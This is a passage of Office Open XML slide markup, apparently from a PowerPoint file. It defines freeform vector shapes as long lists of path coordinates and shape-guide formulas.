                      <a:pt x="159" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="9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3089" name="Freeform 93"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="479" y="2421"/>
                <a:ext cx="61" cy="37"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 187"/>
                  <a:gd name="T1" fmla="*/ 0 h 112"/>
                  <a:gd name="T2" fmla="*/ 0 w 187"/>
                  <a:gd name="T3" fmla="*/ 0 h 112"/>
                  <a:gd name="T4" fmla="*/ 0 w 187"/>
                  <a:gd name="T5" fmla="*/ 0 h 112"/>
                  <a:gd name="T6" fmla="*/ 0 w 187"/>
                  <a:gd name="T7" fmla="*/ 0 h 112"/>
                  <a:gd name="T8" fmla="*/ 0 w 187"/>
                  <a:gd name="T9" fmla="*/ 0 h 112"/>
                  <a:gd name="T10" fmla="*/ 0 w 187"/>
                  <a:gd name="T11" fmla="*/ 0 h 112"/>
                  <a:gd name="T12" fmla="*/ 0 w 187"/>
                  <a:gd name="T13" fmla="*/ 0 h 112"/>
                  <a:gd name="T14" fmla="*/ 0 w 187"/>
                  <a:gd name="T15" fmla="*/ 0 h 112"/>
                  <a:gd name="T16" fmla="*/ 0 w 187"/>
                  <a:gd name="T17" fmla="*/ 0 h 112"/>
                  <a:gd name="T18" fmla="*/ 0 w 187"/>
                  <a:gd name="T19" fmla="*/ 0 h 112"/>
                  <a:gd name="T20" fmla="*/ 0 w 187"/>
                  <a:gd name="T21" fmla="*/ 0 h 112"/>
                  <a:gd name="T22" fmla="*/ 0 w 187"/>
                  <a:gd name="T23" fmla="*/ 0 h 112"/>
                  <a:gd name="T24" fmla="*/ 0 w 187"/>
                  <a:gd name="T25" fmla="*/ 0 h 112"/>
                  <a:gd name="T26" fmla="*/ 0 w 187"/>
                  <a:gd name="T27" fmla="*/ 0 h 112"/>
                  <a:gd name="T28" fmla="*/ 0 w 187"/>
                  <a:gd name="T29" fmla="*/ 0 h 112"/>
                  <a:gd name="T30" fmla="*/ 0 w 187"/>
                  <a:gd name="T31" fmla="*/ 0 h 112"/>
                  <a:gd name="T32" fmla="*/ 0 w 187"/>
                  <a:gd name="T33" fmla="*/ 0 h 112"/>
                  <a:gd name="T34" fmla="*/ 0 w 187"/>
                  <a:gd name="T35" fmla="*/ 0 h 112"/>
                  <a:gd name="T36" fmla="*/ 0 w 187"/>
                  <a:gd name="T37" fmla="*/ 0 h 112"/>
                  <a:gd name="T38" fmla="*/ 0 w 187"/>
                  <a:gd name="T39" fmla="*/ 0 h 112"/>
                  <a:gd name="T40" fmla="*/ 0 w 187"/>
                  <a:gd name="T41" fmla="*/ 0 h 112"/>
                  <a:gd name="T42" fmla="*/ 0 w 187"/>
                  <a:gd name="T43" fmla="*/ 0 h 112"/>
                  <a:gd name="T44" fmla="*/ 0 w 187"/>
                  <a:gd name="T45" fmla="*/ 0 h 112"/>
                  <a:gd name="T46" fmla="*/ 0 w 187"/>
                  <a:gd name="T47" fmla="*/ 0 h 112"/>
                  <a:gd name="T48" fmla="*/ 0 w 187"/>
                  <a:gd name="T49" fmla="*/ 0 h 112"/>
                  <a:gd name="T50" fmla="*/ 0 w 187"/>
                  <a:gd name="T51" fmla="*/ 0 h 112"/>
                  <a:gd name="T52" fmla="*/ 0 w 187"/>
                  <a:gd name="T53" fmla="*/ 0 h 112"/>
                  <a:gd name="T54" fmla="*/ 0 w 187"/>
                  <a:gd name="T55" fmla="*/ 0 h 112"/>
                  <a:gd name="T56" fmla="*/ 0 w 187"/>
                  <a:gd name="T57" fmla="*/ 0 h 112"/>
                  <a:gd name="T58" fmla="*/ 0 w 187"/>
                  <a:gd name="T59" fmla="*/ 0 h 112"/>
                  <a:gd name="T60" fmla="*/ 0 w 187"/>
                  <a:gd name="T61" fmla="*/ 0 h 112"/>
                  <a:gd name="T62" fmla="*/ 0 w 187"/>
                  <a:gd name="T63" fmla="*/ 0 h 112"/>
                  <a:gd name="T64" fmla="*/ 0 w 187"/>
                  <a:gd name="T65" fmla="*/ 0 h 112"/>
                  <a:gd name="T66" fmla="*/ 0 w 187"/>
                  <a:gd name="T67" fmla="*/ 0 h 112"/>
                  <a:gd name="T68" fmla="*/ 0 w 187"/>
                  <a:gd name="T69" fmla="*/ 0 h 112"/>
                  <a:gd name="T70" fmla="*/ 0 w 187"/>
                  <a:gd name="T71" fmla="*/ 0 h 112"/>
                  <a:gd name="T72" fmla="*/ 0 w 187"/>
                  <a:gd name="T73" fmla="*/ 0 h 112"/>
                  <a:gd name="T74" fmla="*/ 0 w 187"/>
                  <a:gd name="T75" fmla="*/ 0 h 112"/>
                  <a:gd name="T76" fmla="*/ 0 w 187"/>
                  <a:gd name="T77" fmla="*/ 0 h 112"/>
                  <a:gd name="T78" fmla="*/ 0 w 187"/>
                  <a:gd name="T79" fmla="*/ 0 h 112"/>
                  <a:gd name="T80" fmla="*/ 0 w 187"/>
                  <a:gd name="T81" fmla="*/ 0 h 112"/>
                  <a:gd name="T82" fmla="*/ 0 w 187"/>
                  <a:gd name="T83" fmla="*/ 0 h 112"/>
                  <a:gd name="T84" fmla="*/ 0 w 187"/>
                  <a:gd name="T85" fmla="*/ 0 h 112"/>
                  <a:gd name="T86" fmla="*/ 0 w 187"/>
                  <a:gd name="T87" fmla="*/ 0 h 112"/>
                  <a:gd name="T88" fmla="*/ 0 w 187"/>
                  <a:gd name="T89" fmla="*/ 0 h 112"/>
                  <a:gd name="T90" fmla="*/ 0 w 187"/>
                  <a:gd name="T91" fmla="*/ 0 h 112"/>
                  <a:gd name="T92" fmla="*/ 0 w 187"/>
                  <a:gd name="T93" fmla="*/ 0 h 112"/>
                  <a:gd name="T94" fmla="*/ 0 w 187"/>
                  <a:gd name="T95" fmla="*/ 0 h 112"/>
                  <a:gd name="T96" fmla="*/ 0 w 187"/>
                  <a:gd name="T97" fmla="*/ 0 h 112"/>
                  <a:gd name="T98" fmla="*/ 0 w 187"/>
                  <a:gd name="T99" fmla="*/ 0 h 112"/>
                  <a:gd name="T100" fmla="*/ 0 w 187"/>
                  <a:gd name="T101" fmla="*/ 0 h 112"/>
                  <a:gd name="T102" fmla="*/ 0 w 187"/>
                  <a:gd name="T103" fmla="*/ 0 h 112"/>
                  <a:gd name="T104" fmla="*/ 0 w 187"/>
                  <a:gd name="T105" fmla="*/ 0 h 112"/>
                  <a:gd name="T106" fmla="*/ 0 w 187"/>
                  <a:gd name="T107" fmla="*/ 0 h 112"/>
                  <a:gd name="T108" fmla="*/ 0 w 187"/>
                  <a:gd name="T109" fmla="*/ 0 h 112"/>
                  <a:gd name="T110" fmla="*/ 0 w 187"/>
                  <a:gd name="T111" fmla="*/ 0 h 112"/>
                  <a:gd name="T112" fmla="*/ 0 w 187"/>
                  <a:gd name="T113" fmla="*/ 0 h 112"/>
                  <a:gd name="T114" fmla="*/ 0 w 187"/>
                  <a:gd name="T115" fmla="*/ 0 h 112"/>
                  <a:gd name="T116" fmla="*/ 0 w 187"/>
                  <a:gd name="T117" fmla="*/ 0 h 112"/>
                  <a:gd name="T118" fmla="*/ 0 w 187"/>
                  <a:gd name="T119" fmla="*/ 0 h 1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7"/>
                  <a:gd name="T181" fmla="*/ 0 h 112"/>
                  <a:gd name="T182" fmla="*/ 187 w 187"/>
                  <a:gd name="T183" fmla="*/ 112 h 11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7" h="112">
                    <a:moveTo>
                      <a:pt x="0" y="80"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="8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3090" name="Freeform 94"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="425" y="2268"/>
                <a:ext cx="239" cy="148"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 734"/>
                  <a:gd name="T1" fmla="*/ 0 h 454"/>
                  <a:gd name="T2" fmla="*/ 0 w 734"/>
                  <a:gd name="T3" fmla="*/ 0 h 454"/>
                  <a:gd name="T4" fmla="*/ 0 w 734"/>
                  <a:gd name="T5" fmla="*/ 0 h 454"/>
                  <a:gd name="T6" fmla="*/ 0 w 734"/>
                  <a:gd name="T7" fmla="*/ 0 h 454"/>
                  <a:gd name="T8" fmla="*/ 0 w 734"/>
                  <a:gd name="T9" fmla="*/ 0 h 454"/>
                  <a:gd name="T10" fmla="*/ 0 w 734"/>
                  <a:gd name="T11" fmla="*/ 0 h 454"/>
                  <a:gd name="T12" fmla="*/ 0 w 734"/>
                  <a:gd name="T13" fmla="*/ 0 h 454"/>
                  <a:gd name="T14" fmla="*/ 0 w 734"/>
                  <a:gd name="T15" fmla="*/ 0 h 454"/>
                  <a:gd name="T16" fmla="*/ 0 w 734"/>
                  <a:gd name="T17" fmla="*/ 0 h 454"/>
                  <a:gd name="T18" fmla="*/ 0 w 734"/>
                  <a:gd name="T19" fmla="*/ 0 h 454"/>
                  <a:gd name="T20" fmla="*/ 0 w 734"/>
                  <a:gd name="T21" fmla="*/ 0 h 454"/>
                  <a:gd name="T22" fmla="*/ 0 w 734"/>
                  <a:gd name="T23" fmla="*/ 0 h 454"/>
                  <a:gd name="T24" fmla="*/ 0 w 734"/>
                  <a:gd name="T25" fmla="*/ 0 h 454"/>
                  <a:gd name="T26" fmla="*/ 0 w 734"/>
                  <a:gd name="T27" fmla="*/ 0 h 454"/>
                  <a:gd name="T28" fmla="*/ 0 w 734"/>
                  <a:gd name="T29" fmla="*/ 0 h 454"/>
                  <a:gd name="T30" fmla="*/ 0 w 734"/>
                  <a:gd name="T31" fmla="*/ 0 h 454"/>
